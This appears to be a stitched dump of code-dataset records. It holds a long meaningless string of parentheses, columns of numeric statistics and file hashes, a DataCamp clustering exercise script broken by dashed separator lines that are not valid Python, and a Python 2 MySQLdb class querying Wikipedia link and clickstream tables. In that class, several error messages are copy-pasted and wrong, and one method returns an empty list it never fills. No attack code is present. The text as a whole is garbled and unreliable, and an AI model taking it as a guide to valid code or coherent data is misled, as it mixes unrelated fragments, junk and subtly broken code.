(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
()())))(())()())((((()())((())))((()))()())))()(()()()(()((()))()()()))()()()(()()((((())()(((()(((())((()))()((()(()))()())))))))))())()())(()()))((()()()()())))((()()((((()()))))(())())()()))))(())()(()))((((((()))(()()()()(())(()((()))(()(())(((()()))(()((((()((((()((((())(())))()(())))()))(()((((((((())()()((())((()())()))))())())()(((((()()(((((())()((()(((()))(()(()))(()(()())))())(()((((()((()(((((()()))((()(()((())()))))(()(()())((()((()((((())))(()())()))()())())()))))(())))(())()((())(()(()))))()())(((()(()(((((((((()(()()())))((()((()())())())(((((()(()))))()))()))))()())()(()(())))(()))))(()))(((()))))())))))(((())((())((((()((()))((())))()))(((()))())()))()()()((()()(()())(()))()()((()())))))())(()())(((())))))())(())()))()())())(()(()((())((()(()((())(()()()(()((()(((()(())()(((())))))()())))))(()((((()(()()))(((())(()))(()()))))(())()((()))()))()()))()((())(()())())())(()))(()()(())()(()((((()())(((())(()()())())(()()))())))(()((())(()()))))(()))((()()((((()())(()()))()())()())))()(()((((())())()(())()))()()(()(()))))))(((()()((()))(()((((()()((())))())())))()())))())))((())()()()))()((()((()))()()())))(())())(()(()(()(()))())()))(())((())()())(((()()(((())(()()))(()())(())))()))(((()()()())))())))(((()))())())())))(((()))()())())())))))()()()()(())))(()())))(()()())))()((((()()()((((()))()())))(()))()))))(()())()))(((((())()((())()))(()())()()()())()(((()(()(())))))(()(((()()))((((()()))()))(((())(()(()))()(())))()()(()))))()))))()())))()))((((((((()()())((()(()()()(((())())())))()()(())(())))()())()())))((()))((((())()()))(())(((())(()()(((((()()((()()(((()(()()(((())()))))()(()())(()((((()()())(((()))(())((())()))))())))))(()()()())))()))(())((()())()())()()))(())))((()))()()((()())()()))(()()(())()())(())))((()(((())))()))))((((()))((())())())()(())(()))((((((())()()(((((()))()())(((()(()(())()((()())))(((())(()(())))))(()(()(((()))(())((((())))((())((((((((()(((((()(())))((((((())(()((((()(())()()((())())())((((((((()))))(((())()))()()))(())(())(
)()())(()()((())(()))())(((())(()((())(())(())))))(()(()(()()(((()()()))())(()))(())())()(((()((())((()())()(((((()()(()))))(((())()()))(()(()(()(()((())))))))(())())()))()(()(()))))()()((((())()())(((())(()))((()())(()((())()()(())((((())))))(())())())(())(()()(()()))(((()((((())(((())))))(()()()()(((()((((())(()))((())()))()(((((((()(()())))((()()(()()((())()))()(())))((()()((((()()()))((())()))((())(((()(()()()(((()((())((())()())())))((()))))))))))(())()()(((()()())))(((()))(()))))(((()(()())(()))(())((()))(((()(()()(((((((()())((((()))((((()(()())())()(((()(()((()))))))))))()()(((()()((((((((((())))))((((())())((()(((()())()))()()(((((())(()())())(((()((())((((((())(((())(((()(()(((((((()(())()())(()))))(()(((()))))))()))(((())))(()(()())()))(()()(()(()((()())()(())((()()((()()()(()(()()))(((((())()(()())()((()())()))(((((()((())()((()((((()(((())())(()()(())()(())(()(())))))(()())((()((()()()())(()))(()))))))(()((())(())((())()())()()))(()((()))(()()))()())(())(()()(()))((())()((())((((((())()(()()(((((())(()())())())()()(()())))))()))()((())((((((()())((()))))))((()(()()(((((((())))))))((()))(())(((()(()(())()()()()(()(())()))))))())()))()(((((()(())(((()))((()))()))()()(()(()((())(()))))()())((()())))))))(()()(()()))()((()(())()((())(()()))())((()())())()()))))((((()()()))())(())()())))()))()))))()))((()(()())()))()))(((()()()()())))())()))((()()())((()())))(((()((()()())(())))()(())(()(()(())(()(((((()()()(((())()())(()((()())(()(((()(())((((()())()(())))(((((((()))))())())))(()))()()(((()())(()))()())(())()))()((())()((())((()((())()())(()()))(((((()()()((((((((()(()((()()((((((()())))((((((())))())(()(()((((()(()())())()()))()((())())(()((((()(((()())((())))))(()())(()()()(()))()())()()))((()((()())(())()()()((())()()))))())()))())))(()))(()))()))((())()((()((()))))))())(((()))))))()(((()((())))((()())())()))((()(()(()(()))((()()))())))(()())))())(()))(())(())))))()(())(()()))()))((())))(()))(()))))(())()())(()(()))())(()(())(())))(()))())(()())))())(()()
)((()))()()((()(()()()(((((()((()((())(()())(())))()))))))(((())())))()((((()))()((()))())()))()))(()(()((()()())()()(((()))())))))()((((()()))))()))())))()())))(((((()(())))())(((()))((()))(((()(())())()((()(((()))()())))))((((()))()(()((((((()(()()()())(())((()))()(()()))))))()(((())))(())()())))))((()))(())()))))(()(((()()((())(()))))(((((()))))())))()(())(()(()))()))()))(()((())(()((()())()(((()))))())(())()(())))((())(()(((()))(((((()))(()))())))(()((((((())()((((())())()))((())))))())(()(())())))))()()(((())()())))))()))()())))()(())())(())()()()(((())))(())(((()))(()(((()()))())((()))(((()()()()())()()))(()))))()()))))(((()()))))()()(()()))()()()())())()((())(((()())(((())(()((()(((()(()())()()()(()((())(()()(()()()))))))()((()))))()(()))()))(())()()())))()()(((()))((()()(((()())))((()()())((())))))()())()((())))())(()())()()()()((())((()()())((()()))())(())())()(()(((()))())(()))))(()()))(())))))))()())()((()())()()))()())))((()()(()())()(()))((())()))(((())))())))(((()()())())(")
| 419.894737
| 15,007
| 0.026009
| 88
| 15,956
| 4.647727
| 0.306818
| 0.08802
| 0.425428
| 0.415648
| 0.503667
| 0.503667
| 0.425428
| 0.425428
| 0.425428
| 0.425428
| 0
| 0.00045
| 0.024254
| 15,956
| 37
| 15,008
| 431.243243
| 0.025821
| 0
| 0
| 0.178571
| 0
| 0
| 0.946412
| 0.945028
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.214286
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7d9eb04b823fa669743531484650c5f93bdb2d6f
| 4,017
|
py
|
Python
|
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | 7
|
2020-09-14T00:26:19.000Z
|
2022-02-08T20:53:52.000Z
|
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | null | null | null |
Machine Learning Scientist with Python Track/6. Cluster Analysis in Python/ch2_exercises.py
|
MuhammadAlBarham/datacamp
|
65c180163b1ad235c79d85d4926e586a15a5f78f
|
[
"MIT"
] | 8
|
2021-01-12T15:23:20.000Z
|
2022-03-17T12:06:00.000Z
|
# NOTE(review): DataCamp exercise transcript, not an importable module --
# the "-----" separator lines are not valid Python, and `comic_con`, `fifa`,
# `sns` (seaborn) and `plt` (matplotlib.pyplot) are predefined by the
# DataCamp exercise environment, not by this file.
# Exercise_1
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function (Ward linkage, Euclidean distance)
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method = 'ward', metric = 'euclidean')
# Assign cluster labels (cut the tree into at most 2 clusters)
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
                hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_2
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function (single linkage: nearest-point distance)
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method = 'single', metric = 'euclidean')
# Assign cluster labels
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion = 'maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
                hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_3
# Import the fcluster and linkage functions
from scipy.cluster.hierarchy import fcluster, linkage
# Use the linkage() function (complete linkage: farthest-point distance)
distance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method ='complete', metric= 'euclidean')
# Assign cluster labels
comic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')
# Plot clusters
sns.scatterplot(x='x_scaled', y='y_scaled',
                hue='cluster_labels', data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_4
# Import the pyplot class
from matplotlib import pyplot as plt
# Define a colors dictionary for clusters
colors = {1:'red', 2:'blue'}
# Plot a scatter plot, mapping each cluster label to its color
comic_con.plot.scatter(x = 'x_scaled',
                       y = 'y_scaled',
                       c = comic_con['cluster_labels'].apply(lambda x: colors[x]))
plt.show()
--------------------------------------------------
# Exercise_5
# Import the seaborn module
import seaborn as sns
# Plot a scatter plot using seaborn (hue colors points by cluster)
sns.scatterplot(x='x_scaled',
                y='y_scaled',
                hue = 'cluster_labels',
                data = comic_con)
plt.show()
--------------------------------------------------
# Exercise_6
# Import the dendrogram function
from scipy.cluster.hierarchy import dendrogram
# Create a dendrogram from the linkage matrix
dn = dendrogram(distance_matrix)
# Display the dendrogram
plt.show()
--------------------------------------------------
# Exercise_7
# Incremental steps of the same exercise: each numbered part repeats the
# previous one and adds a step (linkage -> labels -> centers -> plot).
#1
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], method= 'ward')
#2
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
#3
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
# Display cluster centers of each cluster
print(fifa[['scaled_sliding_tackle', 'scaled_aggression', 'cluster_labels']].groupby('cluster_labels').mean())
#4
# Fit the data into a hierarchical clustering algorithm
distance_matrix = linkage(fifa[['scaled_sliding_tackle', 'scaled_aggression']], 'ward')
# Assign cluster labels to each row of data
fifa['cluster_labels'] = fcluster(distance_matrix, 3, criterion='maxclust')
# Display cluster centers of each cluster
print(fifa[['scaled_sliding_tackle', 'scaled_aggression', 'cluster_labels']].groupby('cluster_labels').mean())
# Create a scatter plot through seaborn
sns.scatterplot(x='scaled_sliding_tackle', y='scaled_aggression', hue='cluster_labels', data=fifa)
plt.show()
--------------------------------------------------
| 32.658537
| 110
| 0.66592
| 484
| 4,017
| 5.349174
| 0.177686
| 0.110467
| 0.02472
| 0.067207
| 0.793743
| 0.781769
| 0.775589
| 0.775589
| 0.775589
| 0.775589
| 0
| 0.005496
| 0.139408
| 4,017
| 122
| 111
| 32.92623
| 0.743419
| 0.268608
| 0
| 0.705882
| 0
| 0
| 0.253453
| 0.05076
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.117647
| null | null | 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
817edcb2ea1c45af36caf1b02c9ec8f9c60f7216
| 22,423
|
py
|
Python
|
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | 6
|
2016-03-11T08:31:02.000Z
|
2020-06-25T14:12:47.000Z
|
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | null | null | null |
parsingframework/wsd/database/mysqlworkview.py
|
linksuccess/linksuccess
|
88059db1d93de56d3b67771b7383f9570c78f49f
|
[
"MIT"
] | 1
|
2018-03-24T13:06:25.000Z
|
2018-03-24T13:06:25.000Z
|
import MySQLdb
import logging
class MySQLWorkView:
    """The MySQLWorkView class allows database access optimized to
    retrieve disambiguation entries from the database.

    NOTE: this module uses Python 2 syntax (``except Err, e`` and bare
    ``print``) and the MySQLdb driver.
    """

    def __init__(self, db_connection):
        """constructor

        @param db_connection the database connection used to access the database
        """
        self._db_connection = db_connection
        # single cursor reused by every query issued through this view
        self._cursor = db_connection.cursor()
        self.reset_cache()

    def __del__(self):
        """destructor

        closes the database connection
        """
        # NOTE(review): closing in __del__ ties the connection lifetime to
        # garbage collection; an explicit close() would be more deterministic
        # -- confirm no caller relies on the connection after this view dies.
        self._db_connection.close()

    def reset_cache(self):
        """resets the internal caches and thus prevents them from growing too big"""
        self._redirect_cache = {}     # not used by the methods visible here
        self._link_cache = {}         # article id -> fetchall() rows of incoming-link source ids
        self._article_cache = {}      # title -> {'id': ..., 'title': ...} or None
        self._occurrences_cache = {}  # not used by the methods visible here
        self._templates_cache = {}    # not used by the methods visible here
def resolve_redirect(self, name):
    """resolves a redirect and returns the real article name

    @param name the name of the redirect
    @return the real name of the article or None if it cannot be resolved
    """
    try:
        self._cursor.execute('SELECT target_article_name FROM redirects WHERE source_article_name=%s;', (name,))
        row = self._cursor.fetchone()
        if row != None:
            return row[0]
    except MySQLdb.Error, e:  # Python 2 except syntax
        # non-ASCII characters are dropped so the log line itself cannot fail
        logging.error('error resolving redirect for name "%s": %s (%d)'
                      % (name.encode('ascii', 'ignore'), e.args[1], e.args[0]))
    return None
def retrieve_number_of_common_articles(self, id1, id2):
    """computes the number of articles that link to both referenced articles

    @param id1 the id of the first article to be linked to
    @param id2 the id of the second article to be linked to
    @return the number of articles that link to both referenced articles
    """
    # retrieve from database and store in cache (one query per uncached id)
    try:
        if id1 not in self._link_cache:
            self._cursor.execute('SELECT source_article_id FROM links WHERE target_article_id=%s;', (id1,))
            self._link_cache[id1] = self._cursor.fetchall()
        if id2 not in self._link_cache:
            self._cursor.execute('SELECT source_article_id FROM links WHERE target_article_id=%s;', (id2,))
            self._link_cache[id2] = self._cursor.fetchall()
    except MySQLdb.Error, e:
        # NOTE(review): if the query failed, the cache entry is missing and
        # the loops below raise KeyError -- confirm this is intended.
        logging.error('error resolving links for source article id %d or %d: %s (%d)'
                      % (id1, id2, e.args[1], e.args[0]))
    # find common articles
    # NOTE(review): O(len1*len2) nested scan; duplicate rows would inflate
    # the count. A set intersection would be linear -- verify duplicates
    # cannot occur before changing this.
    counter = 0
    for source1 in self._link_cache[id1]:
        for source2 in self._link_cache[id2]:
            if source1 == source2:
                counter += 1
    return counter
def resolve_title(self, title):
    """resolves an article and returns it

    @param title the title of the article
    @return a dictionary with fields 'id' and 'title' or None if it could not be resolved
    """
    if title in self._article_cache:
        return self._article_cache[title]
    try:
        # presumably MediaWiki-style lookup: titles are stored with a capital
        # first letter (raises IndexError on an empty title -- TODO confirm
        # empty titles never reach this method)
        t = title[0].upper() + title[1:]
        self._cursor.execute('SELECT id, title FROM articles WHERE title=%s;', (t,))
        row = self._cursor.fetchone()
        if row == None:
            # fall back to resolving the title through the redirects table
            self._cursor.execute(
                'SELECT id, title FROM articles WHERE title=(SELECT target_article_name FROM redirects WHERE source_article_name=%s);',
                (title,))
            row = self._cursor.fetchone()
        if row == None:
            print t  # Python 2 debug output for unresolved titles
            self._article_cache[title] = None  # negative result is cached too
        else:
            self._article_cache[title] = {'id': row[0], 'title': row[1]}
            # also cache under the canonical title when it differs
            if (row[1] != title):
                self._article_cache[row[1]] = {'id': row[0], 'title': row[1]}
    except MySQLdb.Error, e:
        logging.error('error resolving article "%s": %s (%d)'
                      % (title.encode('ascii', 'ignore'), e.args[1], e.args[0]))
    if title in self._article_cache:
        return self._article_cache[title]
    return None
def retrieve_all_articles(self):
    """retrieves all articles. useful for crawling or making media wiki api requests

    @return a list of dictionaries holding the following keys:
        'id': the id of the retrieved article
        'rev_id': the revision id of the retrieved article
        'title': the title of the retrieved article
    """
    articles = []
    try:
        # earlier sampled variants kept for reference:
        #self._cursor.execute('SELECT * FROM articles WHERE RAND()<=0.0006 limit 1000;')
        #self._cursor.execute('SELECT * FROM articles limit 1000;')
        self._cursor.execute('SELECT * FROM articles;')
        result = self._cursor.fetchall()
        for row in result:
            article = {}
            article['id'] = row[0]
            article['rev_id'] = row[1]
            article['title'] = row[2]
            articles.append(article)
    except MySQLdb.Error, e:
        # NOTE(review): message says "1000 random articles" but the active
        # query fetches all articles -- stale text from the commented variants.
        logging.error('error retrieving 1000 random articles %s (%d)' % (e.args[1], e.args[0]))
    return articles

def retrieve_all_articles_questionmark(self):
    """retrieves all articles whose title starts with a question mark.
    useful for crawling or making media wiki api requests

    @return a list of dictionaries holding the following keys:
        'id': the id of the retrieved article
        'rev_id': the revision id of the retrieved article
        'title': the title of the retrieved article
    """
    articles = []
    try:
        #self._cursor.execute('SELECT * FROM articles WHERE RAND()<=0.0006 limit 1000;')
        #self._cursor.execute('SELECT * FROM articles limit 1000;')
        # LIKE "?%" matches titles beginning with a literal question mark
        self._cursor.execute('SELECT * FROM articles WHERE title LIKE %s;', ("?%",))
        result = self._cursor.fetchall()
        for row in result:
            article = {}
            article['id'] = row[0]
            article['rev_id'] = row[1]
            article['title'] = row[2]
            articles.append(article)
    except MySQLdb.Error, e:
        # NOTE(review): stale message (see retrieve_all_articles)
        logging.error('error retrieving 1000 random articles %s (%d)' % (e.args[1], e.args[0]))
    return articles
def retrieve_all_unique_links(self):
    """retrieves all links. These are the network edges

    @return a list of dictionaries holding the following keys:
        'from': the source article id
        'to': the target article id
    """
    links = []
    try:
        self._cursor.execute('SELECT * FROM unique_links;')
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['from'] = row[0]
            link['to'] = row[1]
            links.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
    return links

def retrieve_all_transitions(self):
    """retrieves all transitions from the wikipeida clickstream_derived that are internal links.
    These are the network edges

    @return a list of dictionaries holding the following keys:
        'from': the source article id
        'to': the target article id
    """
    links = []
    try:
        # every "internal*" link type except "internal-nonexistent"
        self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived LIKE %s AND NOT link_type_derived=%s;', ("internal%", "internal-nonexistent",))
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['from'] = row[0]
            link['to'] = row[1]
            links.append(link)
    except MySQLdb.Error, e:
        # NOTE(review): log message reused from retrieve_all_unique_links
        logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
    return links

def retrieve_all_internal_transitions(self):
    """retrieves all internal-link transitions from the wikipeida clickstream_derived.
    These are the network edges

    @return a list of dictionaries holding the following keys:
        'from': the source article id
        'to': the target article id
    """
    links = []
    try:
        self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived=%s;', ("internal-link",))
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['from'] = row[0]
            link['to'] = row[1]
            links.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
    return links

def retrieve_all_internal_transitions_counts(self):
    """retrieves all internal-link transitions from the wikipeida clickstream_derived,
    including the transition counts. These are the network edges

    @return a list of dictionaries holding the following keys:
        'from': the source article id
        'to': the target article id
        'counts': the number of observed transitions for this edge
    """
    links = []
    try:
        self._cursor.execute('SELECT * FROM clickstream_derived WHERE link_type_derived=%s;', ("internal-link",))
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['from'] = row[0]
            link['to'] = row[1]
            link['counts']=row[2]
            links.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving unique links %s (%d)' % (e.args[1], e.args[0]))
    return links
def retrieve_all_links_coords(self):
    """retrieves the xy screen coordinates for all links in wikipeida.

    @return a list of dicts holding the following keys:
        'source_article_id': the wikipedia article id
        'x': x position on screen
        'y': y position on screen
    """
    coords = []
    try:
        # only links with a known non-zero 1920x1080 position, excluding self-links
        self._cursor.execute('SELECT source_article_id, target_x_coord_1920_1080, target_y_coord_1920_1080 FROM links where target_x_coord_1920_1080 is not Null and target_y_coord_1920_1080 is not Null and target_x_coord_1920_1080!=0 and target_y_coord_1920_1080!=0 and source_article_id!=target_article_id;')
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['source_article_id']= row[0]
            link['x'] = row[1]
            link['y'] = row[2]
            coords.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
    return coords

def retrieve_all_page_lengths(self):
    """retrieves all page lengths.

    @return a dict mapping page id -> page length
    """
    pages = {}
    try:
        self._cursor.execute('SELECT * FROM page_length;')
        result = self._cursor.fetchall()
        for row in result:
            pages[row[0]]=row[1]
    except MySQLdb.Error, e:
        logging.error('error retrieving pagelength: %s (%d)' % (e.args[1], e.args[0]))
    return pages
def retrieve_all_links_coords_clicks(self):
    """retrieves the xy screen coordinates for all clicked links in wikipeida,
    joined with their clickstream counts and source page length.

    @return a list of dicts holding the following keys:
        'key': (source_article_id, target_article_id) tuple
        'x': x position on screen
        'y': y position on screen
        'counts': clickstream transition count for this link
        'page_length': length of the source page (1920x1080 layout)
    """
    coords = []
    try:
        # join links / clickstream_derived / page_length on article ids;
        # same position filters as retrieve_all_links_coords
        self._cursor.execute('select l.source_article_id, l.target_article_id, l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, c.counts, p.page_length_1920_1080 from links l, clickstream_derived c, page_length p where l.source_article_id=c.prev_id and l.target_article_id=c.curr_id and c.link_type_derived like %s and l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0 and l.source_article_id!=l.target_article_id;', ("internal%",))
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['key']= row[0], row[1]
            link['x'] = row[2]
            link['y'] = row[3]
            link['counts'] = row[4]
            link['page_length'] = row[5]
            coords.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
    return coords

def retrieve_all_links_multpile_occ(self):
    """retrieves the xy screen coordinates for all links in wikipeida,
    keyed by (source, target); multiple occurrences of the same link
    appear as separate entries.

    @return a list of dicts holding the following keys:
        'key': (source_article_id, target_article_id) tuple
        'x': x position on screen
        'y': y position on screen
    """
    coords = []
    try:
        self._cursor.execute('SELECT source_article_id, target_article_id, target_x_coord_1920_1080, target_y_coord_1920_1080 FROM links where target_x_coord_1920_1080 is not Null and target_y_coord_1920_1080 is not Null and target_x_coord_1920_1080!=0 and target_y_coord_1920_1080!=0 and source_article_id!=target_article_id;')
        result = self._cursor.fetchall()
        for row in result:
            link = {}
            link['key']= row[0], row[1]
            link['x'] = row[2]
            link['y'] = row[3]
            coords.append(link)
    except MySQLdb.Error, e:
        logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
    return coords
def retrieve_all_links_coords_clicks_first_occ(self):
"""retrieves all xy coord for all links in wikipeida.
@return a list of coords holding the following keys:
'source_article_id': the wikipedia article id
'x': x position on screen
'y': y position on screen
"""
links = {}
try:
self._cursor.execute('select l.source_article_id, l.target_article_id, l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, c.counts, p.page_length_1920_1080 from links l, clickstream_derived c, page_length p where l.source_article_id=c.prev_id and l.target_article_id=c.curr_id and c.link_type_derived like %s and l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0 and l.source_article_id!=l.target_article_id;', ("internal%",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['x'] = row[2]
link['y'] = row[3]
link['counts'] = row[4]
link['page_length'] = row[5]
try:
prev = links[row[0], row[1]]
if prev['y'] > link['y']:
links[row[0], row[1]] = link
if prev['y']==link['y']:
if prev['x']>link['y']:
links[row[0], row[1]] = link
except:
links[row[0], row[1]] = link
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_links_coords_page_rank(self):
results = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_page_rank, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return results
def retrieve_all_links_coords_indegree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_in_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_outdegree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_out_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_degree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_clustering(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_local_clust, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_kcore(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_kcore, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_eigenvector(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_eigen_centr, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_internalcounts_degree(self):
in_degree = []
out_degree = []
degree = []
page_rank = []
kcore = []
local_clust = []
eigenvector_centr = []
hub = []
authority = []
counts = []
try:
self._cursor.execute('select a.in_degree, a.out_degree, a.degree, a.page_rank, a.kcore,a.local_clustering, a.eigenvector_centr, a.hits_hub, a.hits_authority, sum(c.counts) as counts from clickstream_derived c, article_features a where c.link_type_derived= %s and a.id=c.curr_id group by c.curr_id;', ("internal-link",))
results = self._cursor.fetchall()
for row in results:
in_degree.append(float(row[0]))
out_degree.append(float(row[1]))
degree.append(float(row[2]))
page_rank.append(float(row[3]))
kcore.append(float(row[4]))
local_clust.append(float(row[5]))
eigenvector_centr.append(float(row[6]))
hub.append(float(row[7]))
authority.append(float(row[8]))
counts.append(float(row[9]))
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return in_degree,out_degree,degree, page_rank, kcore, local_clust, eigenvector_centr, hub, authority, counts
| 49.389868
| 576
| 0.593141
| 2,985
| 22,423
| 4.238191
| 0.071022
| 0.047427
| 0.067821
| 0.041736
| 0.818829
| 0.804363
| 0.790293
| 0.780808
| 0.768556
| 0.756067
| 0
| 0.050384
| 0.308701
| 22,423
| 453
| 577
| 49.498896
| 0.765757
| 0.014985
| 0
| 0.601942
| 0
| 0.038835
| 0.351256
| 0.147149
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006472
| null | null | 0.003236
| 0
| 0
| 0
